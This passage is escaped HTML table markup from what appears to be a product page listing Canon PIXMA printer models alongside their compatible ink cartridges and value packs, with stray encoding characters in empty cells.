(Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td 